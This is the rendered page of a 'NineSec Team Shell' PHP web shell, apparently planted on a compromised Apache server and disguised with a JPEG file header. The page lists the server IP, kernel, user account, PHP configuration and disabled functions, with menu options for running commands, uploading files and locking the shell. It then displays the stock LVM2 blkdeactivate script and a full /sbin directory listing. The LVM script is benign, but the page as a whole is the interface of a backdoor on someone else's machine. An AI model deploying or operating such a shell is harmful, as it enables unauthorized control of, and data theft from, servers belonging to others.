�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /sbin/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //sbin/blkdeactivate
#!/bin/bash
#
# Copyright (C) 2012-2017 Red Hat, Inc. All rights reserved.
#
# This file is part of LVM2.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions
# of the GNU General Public License v.2.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Author: Peter Rajnoha <prajnoha at redhat.com>
#
# Script for deactivating block devices
#
# Requires:
#   bash >= 4.0 (associative array support)
#   util-linux {
#       lsblk >= 2.22 (lsblk -s support)
#       umount
#   }
#   dmsetup >= 1.02.68 (--retry option support)
#   lvm >= 2.2.89 (activation/retry_deactivation config support)
#

#set -x
shopt -s dotglob nullglob

TOOL=blkdeactivate

DEV_DIR="/dev"
SYS_BLK_DIR="/sys/block"

MDADM="/sbin/mdadm"
MOUNTPOINT="/bin/mountpoint"
MPATHD="/sbin/multipathd"
UMOUNT="/bin/umount"

sbindir="/sbin"
DMSETUP="$sbindir/dmsetup"
LVM="$sbindir/lvm"

if "$UMOUNT" --help | grep -- "--all-targets" >"$DEV_DIR/null"; then
	UMOUNT_OPTS="--all-targets "
else
	UMOUNT_OPTS=""
	FINDMNT="/bin/findmnt -r --noheadings -u -o TARGET"
	FINDMNT_READ="read -r mnt"
fi
DMSETUP_OPTS=""
LVM_OPTS=""
MDADM_OPTS=""
MPATHD_OPTS=""

LSBLK="/bin/lsblk -r --noheadings -o TYPE,KNAME,NAME,MOUNTPOINT"
LSBLK_VARS="local devtype local kname local name local mnt"
LSBLK_READ="read -r devtype kname name mnt"
SORT_MNT="/usr/bin/sort -r -u -k 4"

# Do not show tool errors by default (only done/skipping summary
# message provided by this script) and no verbose mode by default.
ERRORS=0
VERBOSE=0

# Do not unmount mounted devices by default.
DO_UMOUNT=0

# Deactivate each LV separately by default (not the whole VG).
LVM_DO_WHOLE_VG=0
# Do not retry LV deactivation by default.
LVM_CONFIG="activation{retry_deactivation=0}"

# Do not wait for MD RAID device resync, recovery or reshape.
MDRAID_DO_WAIT=0

# Do not disable queueing if set on multipath devices.
MPATHD_DO_DISABLEQUEUEING=0

#
# List of device names and/or VGs to be skipped.
# Device name is the KNAME from lsblk output.
#
# If deactivation of any device fails, it's automatically
# added to the SKIP_DEVICE_LIST (also a particular VG
# added to the SKIP_VG_LIST for a device that is an LV).
#
# These lists provide device tree pruning to skip
# particular device/VG deactivation that failed already.
# (lists are associative arrays!)
#
declare -A SKIP_DEVICE_LIST=()
declare -A SKIP_VG_LIST=()

#
# List of mountpoints to be skipped. Any device that is mounted on the mountpoint
# listed here will be added to SKIP_DEVICE_LIST (and SKIP_VG_LIST) automatically.
# (list is an associative array!)
#
declare -A SKIP_UMOUNT_LIST=(["/"]=1 \
                             ["/lib"]=1 ["/lib64"]=1 \
                             ["/bin"]=1 ["/sbin"]=1 \
                             ["/var"]=1 ["/var/log"]=1 \
                             ["/usr"]=1 \
                             ["/usr/lib"]=1 ["/usr/lib64"]=1 \
                             ["/usr/sbin"]=1 ["/usr/bin"]=1)
# Bash can't properly handle '[' and ']' used as a subscript
# within the '()'initialization - it needs to be done separately!
SKIP_UMOUNT_LIST["[SWAP]"]=1

usage() {
	echo "${TOOL}: Utility to deactivate block devices"
	echo
	echo "  ${TOOL} [options] [device...]"
	echo "    - Deactivate block device tree."
	echo "      If devices are specified, deactivate only supplied devices and their holders."
	echo
	echo "  Options:"
	echo "    -e | --errors                       Show errors reported from tools"
	echo "    -h | --help                         Show this help message"
	echo "    -d | --dmoptions     DM_OPTIONS     Comma separated DM specific options"
	echo "    -l | --lvmoptions    LVM_OPTIONS    Comma separated LVM specific options"
	echo "    -m | --mpathoptions  MPATH_OPTIONS  Comma separated DM-multipath specific options"
	echo "    -r | --mdraidoptions MDRAID_OPTIONS Comma separated MD RAID specific options"
	echo "    -u | --umount                       Unmount the device if mounted"
	echo "    -v | --verbose                      Verbose mode (also implies -e)"
	echo
	echo "  Device specific options:"
	echo "    DM_OPTIONS:"
	echo "      retry           retry removal several times in case of failure"
	echo "      force           force device removal"
	echo "    LVM_OPTIONS:"
	echo "      retry           retry removal several times in case of failure"
	echo "      wholevg         deactivate the whole VG when processing an LV"
	echo "    MDRAID_OPTIONS:"
	echo "      wait            wait for resync, recovery or reshape to complete first"
	echo "    MPATH_OPTIONS:"
	echo "      disablequeueing disable queueing on all DM-multipath devices first"

	exit
}

add_device_to_skip_list() {
	SKIP_DEVICE_LIST+=(["$kname"]=1)
	return 1
}

add_vg_to_skip_list() {
	SKIP_VG_LIST+=(["$DM_VG_NAME"]=1)
	return 1
}

is_top_level_device() {
	# top level devices do not have any holders, that is
	# the SYS_BLK_DIR/<device_name>/holders dir is empty
	files=$(echo "$SYS_BLK_DIR/$kname/holders/"*)
	test -z "$files"
}

device_umount_one() {
	test -z "$mnt" && return 0

	if test -z "${SKIP_UMOUNT_LIST["$mnt"]}" -a "$DO_UMOUNT" -eq "1"; then
		echo -n "  [UMOUNT]: unmounting $name ($kname) mounted on $mnt... "
		if eval "$UMOUNT" $UMOUNT_OPTS "$(printf "%s" "$mnt")" "$OUT" "$ERR"; then
			echo "done"
		elif "$MOUNTPOINT" -q "$mnt"; then
			echo "skipping"
			add_device_to_skip_list
		else
			echo "already unmounted"
		fi
	else
		echo "  [SKIP]: unmount of $name ($kname) mounted on $mnt"
		add_device_to_skip_list
	fi
}

device_umount() {
	test "$devtype" != "lvm" && test "${kname:0:3}" != "dm-" \
          && test "${kname:0:2}" != "md" && return 0

	# FINDMNT is defined only if umount --all-targets is not available.
	# In that case, read the list of multiple mount points of one device
	# using FINDMNT and unmount it one by one manually.
	if test -z "$FINDMNT"; then
		device_umount_one
	else
		while $FINDMNT_READ; do
			device_umount_one || return 1
		done <<< "$($FINDMNT "$DEV_DIR/$kname")"
	fi

}

deactivate_holders () {
	local skip=1; $LSBLK_VARS

	# Get holders for the device - either a mount or another device.
	# First line on the lsblk output is the device itself - skip it for
	# the deactivate call as this device is already being deactivated.
	while $LSBLK_READ; do
		test -e "$SYS_BLK_DIR/$kname" || continue
		# check if the device not on the skip list already
		test -z "${SKIP_DEVICE_LIST["$kname"]}" || return 1

		# try to deactivate the holder
		test "$skip" -eq 1 && skip=0 && continue
		deactivate || return 1
	done <<< "$($LSBLK "$1")"
}

deactivate_dm () {
	local xname
	xname=$(printf "%s" "$name")
	test -b "$DEV_DIR/mapper/$xname" || return 0
	test -z "${SKIP_DEVICE_LIST["$kname"]}" || return 1

	deactivate_holders "$DEV_DIR/mapper/$xname" || return 1

	echo -n "  [DM]: deactivating $devtype device $xname ($kname)... "
	if eval "$DMSETUP" $DMSETUP_OPTS remove "$xname" "$OUT" "$ERR"; then
		echo "done"
	else
		echo "skipping"
		add_device_to_skip_list
	fi
}

deactivate_lvm () {
	local DM_VG_NAME; local DM_LV_NAME

	eval "$(eval "$DMSETUP" splitname --nameprefixes --noheadings --rows "$name" LVM "$ERR")"
	test -b "$DEV_DIR/$DM_VG_NAME/$DM_LV_NAME" || return 0
	test -z "${SKIP_VG_LIST["$DM_VG_NAME"]}" || return 1

	if test "$LVM_DO_WHOLE_VG" -eq 0; then
		# Skip LVM device deactivation if LVM tools missing.
		test "$LVM_AVAILABLE" -eq 0 && {
			add_device_to_skip_list
			return 1
		}
		# Deactivating only the LV specified
		deactivate_holders "$DEV_DIR/$DM_VG_NAME/$DM_LV_NAME" || {
			add_device_to_skip_list
			return 1
		}

		echo -n "  [LVM]: deactivating Logical Volume $DM_VG_NAME/$DM_LV_NAME... "
		if eval "$LVM" lvchange $LVM_OPTS --config \'log\{prefix=\"\"\} $LVM_CONFIG\' -aln "$DM_VG_NAME/$DM_LV_NAME" "$OUT" "$ERR"; then
			echo "done"
		else
			echo "skipping"
			add_device_to_skip_list
		fi

	else
		# Skip LVM VG deactivation if LVM tools missing.
		test "$LVM_AVAILABLE" -eq 0 && {
			add_vg_to_skip_list
			return 1
		}
		# Deactivating the whole VG the LV is part of
		lv_list=$(eval "$LVM" vgs --config "$LVM_CONFIG" --noheadings --rows -o lv_name "$DM_VG_NAME" "$ERR")
		for lv in $lv_list; do
			test -b "$DEV_DIR/$DM_VG_NAME/$lv" || continue
			deactivate_holders "$DEV_DIR/$DM_VG_NAME/$lv" || {
				add_vg_to_skip_list
				return 1
			}
		done

		echo -n "  [LVM]: deactivating Volume Group $DM_VG_NAME... "
		if eval "$LVM" vgchange $LVM_OPTS --config \'log\{prefix=\"    \"\} $LVM_CONFIG\' -aln "$DM_VG_NAME" "$OUT" "$ERR"; then
			echo "done"
		else
			echo "skipping"
			add_vg_to_skip_list
		fi
	fi
}

deactivate_md () {
	local xname
	xname=$(printf "%s" "$name")
	local sync_action
	test -b "$DEV_DIR/$xname" || return 0
	test -z "${SKIP_DEVICE_LIST["$kname"]}" || return 1

	# Skip MD device deactivation if MD tools missing.
	test "$MDADM_AVAILABLE" -eq 0 && {
		add_device_to_skip_list
		return 1
	}

	deactivate_holders "$DEV_DIR/$xname" || return 1

	echo -n "  [MD]: deactivating $devtype device $kname... "

	test "$MDRAID_DO_WAIT" -eq 1 && {
		sync_action=$(cat "$SYS_BLK_DIR/$kname/md/sync_action")
		test "$sync_action" != "idle" && {
			echo -n "$sync_action action in progress... "
			if eval "$MDADM" $MDADM_OPTS -W "$DEV_DIR/$kname" "$OUT" "$ERR"; then
				echo -n "complete... "
			else
				test $? -ne 1 && echo -n "failed to wait for $sync_action action... "
			fi
		}
	}

	if eval "$MDADM" $MDADM_OPTS -S "$xname" "$OUT" "$ERR"; then
		echo "done"
	else
		echo "skipping"
		add_device_to_skip_list
	fi
}

deactivate () {
	######################################################################
	# DEACTIVATION HOOKS FOR NEW DEVICE TYPES GO HERE!                   #
	#                                                                    #
	# Identify a new device type either by inspecting the TYPE provided  #
	# by lsblk directly ($devtype) or by any other mean that is suitable #
	# e.g. the KNAME provided by lsblk ($kname). See $LSBLK_VARS for     #
	# complete list of variables that may be used. Then call a           #
	# device-specific deactivation function that handles the exact type. #
	#                                                                    #
        # This device-specific function will certainly need to call          #
	# deactivate_holders first to recursively deactivate any existing    #
	# holders it might have before deactivating the device it processes. #
	######################################################################
	if test "$devtype" = "lvm"; then
		deactivate_lvm
	elif test "${kname:0:3}" = "dm-"; then
		deactivate_dm
	elif test "${kname:0:2}" = "md"; then
		deactivate_md
	fi
}

deactivate_all() {
	$LSBLK_VARS
	skip=0

	echo "Deactivating block devices:"

	test "$MPATHD_RUNNING" -eq 1 && {
		echo -n "  [DM]: disabling queueing on all multipath devices... "
		eval "$MPATHD" $MPATHD_OPTS disablequeueing maps "$ERR" | grep '^ok$' >"$DEV_DIR/null" && echo "done" || echo "failed"
	}

	if test $# -eq 0; then
		#######################
		# Process all devices #
		#######################

		# Unmount all relevant mountpoints first
		while $LSBLK_READ; do
			device_umount
		done <<< "$($LSBLK | $SORT_MNT)"

		# Do deactivate
		while $LSBLK_READ; do
			# 'disk' is at the bottom already and it's a real device
			test "$devtype" = "disk" && continue

			# if deactivation of any device fails, skip processing
			# any subsequent devices within its subtree as the
			# top-level device could not be deactivated anyway
			test "$skip" -eq 1 && {
				# reset 'skip' on top level device
				if is_top_level_device ; then
					skip=0
				else
					continue
				fi
			}

			# check if the device is not on the skip list already
			test -z "${SKIP_DEVICE_LIST["$kname"]}" || continue

			# try to deactivate top-level device, set 'skip=1'
			# if it fails to do so - this will cause all the
			# device's subtree to be skipped when processing
			# devices further in this loop
			deactivate || skip=1
		done <<< "$($LSBLK -s)"
	else
		##################################
		# Process only specified devices #
		##################################

		while test $# -ne 0; do
			# Unmount all relevant mountpoints first
			while $LSBLK_READ; do
				device_umount
			done <<< "$($LSBLK "$1" | $SORT_MNT)"

			# Do deactivate
			# Single dm device tree deactivation.
			if test -b "$1"; then
				$LSBLK_READ <<< "$($LSBLK --nodeps "$1")"

				# check if the device is not on the skip list already
				test -z "${SKIP_DEVICE_LIST["$kname"]}" || {
					shift
					continue
				}

				deactivate
			else
				echo "$1: device not found"
				return 1
			fi
			shift
		done;
	fi
}

get_dmopts() {
	ORIG_IFS=$IFS; IFS=','

	for opt in $1; do
		case $opt in
			"") ;;
			"retry") DMSETUP_OPTS+="--retry " ;;
			"force") DMSETUP_OPTS+="--force " ;;
			*) echo "$opt: unknown DM option"
		esac
	done

	IFS=$ORIG_IFS
}

get_lvmopts() {
	ORIG_IFS=$IFS; IFS=','

	for opt in $1; do
		case "$opt" in
			"") ;;
			"retry") LVM_CONFIG="activation{retry_deactivation=1}" ;;
			"wholevg") LVM_DO_WHOLE_VG=1 ;;
			*) echo "$opt: unknown LVM option"
		esac
	done

	IFS=$ORIG_IFS
}

get_mdraidopts() {
	ORIG_IFS=$IFS; IFS=','

	for opt in $1; do
		case "$opt" in
			"") ;;
			"wait") MDRAID_DO_WAIT=1 ;;
			*) echo "$opt: unknown MD RAID option"
		esac
	done

	IFS=$ORIG_IFS
}

get_mpathopts() {
	ORIG_IFS=$IFS; IFS=','

	for opt in $1; do
		case "$opt" in
			"") ;;
			"disablequeueing") MPATHD_DO_DISABLEQUEUEING=1 ;;
			*) echo "$opt: unknown DM-multipath option"
		esac
	done

	IFS=$ORIG_IFS
}

set_env() {
	if test "$ERRORS" -eq "1"; then
		unset ERR
	else
		ERR="2>$DEV_DIR/null"
	fi

	if test "$VERBOSE" -eq "1"; then
		unset OUT
		UMOUNT_OPTS+="-v"
		DMSETUP_OPTS+="-vvvv"
		LVM_OPTS+="-vvvv"
		MDADM_OPTS+="-vv"
		MPATHD_OPTS+="-v 3"
	else
		OUT="1>$DEV_DIR/null"
	fi

	if test -f "$LVM"; then
		LVM_AVAILABLE=1
	else
		LVM_AVAILABLE=0
	fi

	if test -f $MDADM; then
		MDADM_AVAILABLE=1
	else
		MDADM_AVAILABLE=0
	fi

	MPATHD_RUNNING=0
	test "$MPATHD_DO_DISABLEQUEUEING" -eq 1 && {
		if test -f "$MPATHD"; then
			if eval "$MPATHD" show daemon "$ERR" | grep "running" >"$DEV_DIR/null"; then
				MPATHD_RUNNING=1
			fi
		fi
	}
}

while test $# -ne 0; do
	case "$1" in
		"") ;;
		"-e"|"--errors") ERRORS=1 ;;
		"-h"|"--help") usage ;;
		"-d"|"--dmoptions") get_dmopts "$2" ; shift ;;
		"-l"|"--lvmoptions") get_lvmopts "$2" ; shift ;;
		"-m"|"--mpathoptions") get_mpathopts "$2" ; shift ;;
		"-r"|"--mdraidoptions") get_mdraidopts "$2"; shift ;;
		"-u"|"--umount") DO_UMOUNT=1 ;;
		"-v"|"--verbose") VERBOSE=1 ; ERRORS=1 ;;
		"-vv") VERBOSE=1 ; ERRORS=1 ; set -x ;;
		*) break ;;
	esac
	shift
done

set_env
deactivate_all "$@"

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
May 29 2025 6:02:43
root
0755
agetty
67.383 KB
May 30 2023 5:42:35
root
0755
badblocks
34.32 KB
June 02 2022 2:59:32
root
0755
blkdeactivate
14.489 KB
February 13 2020 10:21:51
root
0755
blkdiscard
34.227 KB
May 30 2023 5:42:35
root
0755
blkid
118.258 KB
May 30 2023 5:42:35
root
0755
blkzone
70.227 KB
May 30 2023 5:42:35
root
0755
blockdev
66.227 KB
May 30 2023 5:42:35
root
0755
bridge
102.305 KB
February 13 2020 6:21:59
root
0755
capsh
30.305 KB
June 07 2023 3:02:37
root
0755
cfdisk
102.586 KB
May 30 2023 5:42:35
root
0755
chcpu
46.227 KB
May 30 2023 5:42:35
root
0755
ctrlaltdel
38.227 KB
May 30 2023 5:42:35
root
0755
debugfs
225.805 KB
June 02 2022 2:59:32
root
0755
depmod
170.336 KB
January 28 2022 3:49:50
root
0755
devlink
150.469 KB
February 13 2020 6:21:59
root
0755
dhclient
508.984 KB
January 31 2023 11:10:35
root
0755
dhclient-script
15.922 KB
January 31 2023 11:10:35
root
0755
dmeventd
50.234 KB
February 13 2020 10:21:51
root
0755
dmsetup
171.023 KB
February 13 2020 10:21:51
root
0755
dmstats
171.023 KB
February 13 2020 10:21:51
root
0755
dosfsck
58.078 KB
May 13 2018 12:59:39
root
0755
dosfslabel
54.078 KB
May 13 2018 12:59:39
root
0755
dumpe2fs
30.383 KB
June 02 2022 2:59:32
root
0755
e2fsck
327.211 KB
June 02 2022 2:59:32
root
0755
e2image
42.383 KB
June 02 2022 2:59:32
root
0755
e2label
106.555 KB
June 02 2022 2:59:32
root
0755
e2mmpstatus
30.383 KB
June 02 2022 2:59:32
root
0755
e2scrub
7.125 KB
June 02 2022 2:59:32
root
0755
e2scrub_all
5.269 KB
June 02 2022 2:59:32
root
0755
e2undo
22.375 KB
June 02 2022 2:59:32
root
0755
fatlabel
54.078 KB
May 13 2018 12:59:39
root
0755
fdisk
150.273 KB
May 30 2023 5:42:35
root
0755
findfs
14.227 KB
May 30 2023 5:42:35
root
0755
fsadm
23.543 KB
February 13 2020 10:21:51
root
0755
fsck
54.273 KB
May 30 2023 5:42:35
root
0755
fsck.cramfs
38.258 KB
May 30 2023 5:42:35
root
0755
fsck.ext2
327.211 KB
June 02 2022 2:59:32
root
0755
fsck.ext3
327.211 KB
June 02 2022 2:59:32
root
0755
fsck.ext4
327.211 KB
June 02 2022 2:59:32
root
0755
fsck.fat
58.078 KB
May 13 2018 12:59:39
root
0755
fsck.minix
122.25 KB
May 30 2023 5:42:35
root
0755
fsck.msdos
58.078 KB
May 13 2018 12:59:39
root
0755
fsck.vfat
58.078 KB
May 13 2018 12:59:39
root
0755
fsfreeze
14.227 KB
May 30 2023 5:42:35
root
0755
fstab-decode
14.305 KB
February 13 2020 7:38:21
root
0755
fstrim
70.227 KB
May 30 2023 5:42:35
root
0755
getcap
14.305 KB
June 07 2023 3:02:37
root
0755
getpcaps
14.305 KB
June 07 2023 3:02:37
root
0755
getty
67.383 KB
May 30 2023 5:42:35
root
0755
halt
973.227 KB
November 21 2023 10:10:21
root
0755
hdparm
140.336 KB
August 21 2019 2:36:14
root
0755
hwclock
102.352 KB
May 30 2023 5:42:35
root
0755
ifconfig
85.109 KB
February 01 2019 7:07:53
root
0755
init
1.55 MB
November 21 2023 10:10:21
root
0755
insmod
170.336 KB
January 28 2022 3:49:50
root
0755
installkernel
2.576 KB
December 07 2019 3:13:44
root
0755
ip
597.617 KB
February 13 2020 6:21:59
root
0755
ipmaddr
17.992 KB
February 01 2019 7:07:53
root
0755
ipset
14.148 KB
November 25 2021 10:55:19
root
0755
iptunnel
25.992 KB
February 01 2019 7:07:53
root
0755
isosize
30.227 KB
May 30 2023 5:42:35
root
0755
kbdrate
13.992 KB
May 09 2019 5:22:51
root
0755
killall5
26.383 KB
February 13 2020 7:38:21
root
0755
ldconfig
0.378 KB
November 22 2023 2:32:50
root
0755
ldconfig.real
1 MB
November 22 2023 2:32:50
root
0755
logsave
14.156 KB
June 02 2022 2:59:32
root
0755
losetup
110.344 KB
May 30 2023 5:42:35
root
0755
lsmod
170.336 KB
January 28 2022 3:49:50
root
0755
lvchange
2.73 MB
February 13 2020 10:21:51
root
0755
lvconvert
2.73 MB
February 13 2020 10:21:51
root
0755
lvcreate
2.73 MB
February 13 2020 10:21:51
root
0755
lvdisplay
2.73 MB
February 13 2020 10:21:51
root
0755
lvextend
2.73 MB
February 13 2020 10:21:51
root
0755
lvm
2.73 MB
February 13 2020 10:21:51
root
0755
lvmconfig
2.73 MB
February 13 2020 10:21:51
root
0755
lvmdiskscan
2.73 MB
February 13 2020 10:21:51
root
0755
lvmdump
10.07 KB
February 13 2020 10:21:51
root
0755
lvmpolld
232.055 KB
February 13 2020 10:21:51
root
0755
lvmsadc
2.73 MB
February 13 2020 10:21:51
root
0755
lvmsar
2.73 MB
February 13 2020 10:21:51
root
0755
lvreduce
2.73 MB
February 13 2020 10:21:51
root
0755
lvremove
2.73 MB
February 13 2020 10:21:51
root
0755
lvrename
2.73 MB
February 13 2020 10:21:51
root
0755
lvresize
2.73 MB
February 13 2020 10:21:51
root
0755
lvs
2.73 MB
February 13 2020 10:21:51
root
0755
lvscan
2.73 MB
February 13 2020 10:21:51
root
0755
mii-tool
26.461 KB
February 01 2019 7:07:53
root
0755
mkdosfs
34.5 KB
May 13 2018 12:59:39
root
0755
mke2fs
134.617 KB
June 02 2022 2:59:32
root
0755
mkfs
14.227 KB
May 30 2023 5:42:35
root
0755
mkfs.bfs
34.227 KB
May 30 2023 5:42:35
root
0755
mkfs.cramfs
42.156 KB
May 30 2023 5:42:35
root
0755
mkfs.ext2
134.617 KB
June 02 2022 2:59:32
root
0755
mkfs.ext3
134.617 KB
June 02 2022 2:59:32
root
0755
mkfs.ext4
134.617 KB
June 02 2022 2:59:32
root
0755
mkfs.fat
34.5 KB
May 13 2018 12:59:39
root
0755
mkfs.minix
106.234 KB
May 30 2023 5:42:35
root
0755
mkfs.msdos
34.5 KB
May 13 2018 12:59:39
root
0755
mkfs.ntfs
86.266 KB
November 01 2022 12:56:50
root
0755
mkfs.vfat
34.5 KB
May 13 2018 12:59:39
root
0755
mkhomedir_helper
22.172 KB
January 10 2024 2:55:08
root
0755
mkntfs
86.266 KB
November 01 2022 12:56:50
root
0755
mkswap
106.234 KB
May 30 2023 5:42:35
root
0755
modinfo
170.336 KB
January 28 2022 3:49:50
root
0755
modprobe
170.336 KB
January 28 2022 3:49:50
root
0755
mount.fuse
14.148 KB
March 07 2020 12:09:49
root
0755
mount.lowntfs-3g
118.859 KB
November 01 2022 12:56:50
root
0755
mount.ntfs
158.891 KB
November 01 2022 12:56:50
root
0755
mount.ntfs-3g
158.891 KB
November 01 2022 12:56:50
root
0755
nameif
18.141 KB
February 01 2019 7:07:53
root
0755
ntfsclone
58.273 KB
November 01 2022 12:56:50
root
0755
ntfscp
42.258 KB
November 01 2022 12:56:50
root
0755
ntfslabel
34.258 KB
November 01 2022 12:56:50
root
0755
ntfsresize
78.273 KB
November 01 2022 12:56:50
root
0755
ntfsundelete
54.258 KB
November 01 2022 12:56:50
root
0755
on_ac_power
2.176 KB
July 20 2019 5:43:51
root
0755
pam_extrausers_chkpwd
42.156 KB
January 10 2024 2:55:08
root
2755
pam_extrausers_update
42.156 KB
January 10 2024 2:55:08
root
0755
pam_tally
14.164 KB
January 10 2024 2:55:08
root
0755
pam_tally2
18.164 KB
January 10 2024 2:55:08
root
0755
parted
86.25 KB
December 01 2020 4:18:05
root
0755
partprobe
14.227 KB
December 01 2020 4:18:05
root
0755
pivot_root
14.227 KB
May 30 2023 5:42:35
root
0755
plipconfig
14 KB
February 01 2019 7:07:53
root
0755
plymouthd
146.406 KB
November 02 2020 11:02:17
root
0755
poweroff
973.227 KB
November 21 2023 10:10:21
root
0755
pvchange
2.73 MB
February 13 2020 10:21:51
root
0755
pvck
2.73 MB
February 13 2020 10:21:51
root
0755
pvcreate
2.73 MB
February 13 2020 10:21:51
root
0755
pvdisplay
2.73 MB
February 13 2020 10:21:51
root
0755
pvmove
2.73 MB
February 13 2020 10:21:51
root
0755
pvremove
2.73 MB
February 13 2020 10:21:51
root
0755
pvresize
2.73 MB
February 13 2020 10:21:51
root
0755
pvs
2.73 MB
February 13 2020 10:21:51
root
0755
pvscan
2.73 MB
February 13 2020 10:21:51
root
0755
quotacheck
111.375 KB
April 09 2019 10:12:04
root
0755
quotaoff
83.125 KB
April 09 2019 10:12:04
root
0755
quotaon
83.125 KB
April 09 2019 10:12:04
root
0755
rarp
40.453 KB
February 01 2019 7:07:53
root
0755
raw
14.227 KB
May 30 2023 5:42:35
root
0755
reboot
973.227 KB
November 21 2023 10:10:21
root
0755
resize2fs
66.375 KB
June 02 2022 2:59:32
root
0755
rmmod
170.336 KB
January 28 2022 3:49:50
root
0755
route
64.305 KB
February 01 2019 7:07:53
root
0755
rtacct
48.289 KB
February 13 2020 6:21:59
root
0755
rtmon
78.242 KB
February 13 2020 6:21:59
root
0755
runlevel
973.227 KB
November 21 2023 10:10:21
root
0755
runuser
66.227 KB
May 30 2023 5:42:35
root
0755
setcap
14.305 KB
June 07 2023 3:02:37
root
0755
setvtrgb
14.133 KB
May 09 2019 5:22:51
root
0755
sfdisk
138.227 KB
May 30 2023 5:42:35
root
0755
shadowconfig
0.864 KB
July 15 2021 12:08:18
root
0755
shutdown
973.227 KB
November 21 2023 10:10:21
root
0755
slattach
44.453 KB
February 01 2019 7:07:53
root
0755
start-stop-daemon
47.32 KB
May 25 2022 1:14:20
root
0755
sulogin
50.227 KB
May 30 2023 5:42:35
root
0755
swaplabel
18.227 KB
May 30 2023 5:42:35
root
0755
swapoff
22.227 KB
May 30 2023 5:42:35
root
0755
swapon
50.227 KB
May 30 2023 5:42:35
root
0755
switch_root
14.227 KB
May 30 2023 5:42:35
root
0755
sysctl
30.234 KB
October 31 2023 12:35:56
root
0755
tc
529.453 KB
February 13 2020 6:21:59
root
0755
telinit
973.227 KB
November 21 2023 10:10:21
root
0755
tipc
126.234 KB
February 13 2020 6:21:59
root
0755
tune2fs
106.555 KB
June 02 2022 2:59:32
root
0755
unix_chkpwd
42.148 KB
January 10 2024 2:55:08
root
2755
unix_update
42.148 KB
January 10 2024 2:55:08
root
0755
vgcfgbackup
2.73 MB
February 13 2020 10:21:51
root
0755
vgcfgrestore
2.73 MB
February 13 2020 10:21:51
root
0755
vgchange
2.73 MB
February 13 2020 10:21:51
root
0755
vgck
2.73 MB
February 13 2020 10:21:51
root
0755
vgconvert
2.73 MB
February 13 2020 10:21:51
root
0755
vgcreate
2.73 MB
February 13 2020 10:21:51
root
0755
vgdisplay
2.73 MB
February 13 2020 10:21:51
root
0755
vgexport
2.73 MB
February 13 2020 10:21:51
root
0755
vgextend
2.73 MB
February 13 2020 10:21:51
root
0755
vgimport
2.73 MB
February 13 2020 10:21:51
root
0755
vgimportclone
2.73 MB
February 13 2020 10:21:51
root
0755
vgmerge
2.73 MB
February 13 2020 10:21:51
root
0755
vgmknodes
2.73 MB
February 13 2020 10:21:51
root
0755
vgreduce
2.73 MB
February 13 2020 10:21:51
root
0755
vgremove
2.73 MB
February 13 2020 10:21:51
root
0755
vgrename
2.73 MB
February 13 2020 10:21:51
root
0755
vgs
2.73 MB
February 13 2020 10:21:51
root
0755
vgscan
2.73 MB
February 13 2020 10:21:51
root
0755
vgsplit
2.73 MB
February 13 2020 10:21:51
root
0755
wipefs
46.227 KB
May 30 2023 5:42:35
root
0755
zramctl
114.344 KB
May 30 2023 5:42:35
root
0755

NineSec Team - 2022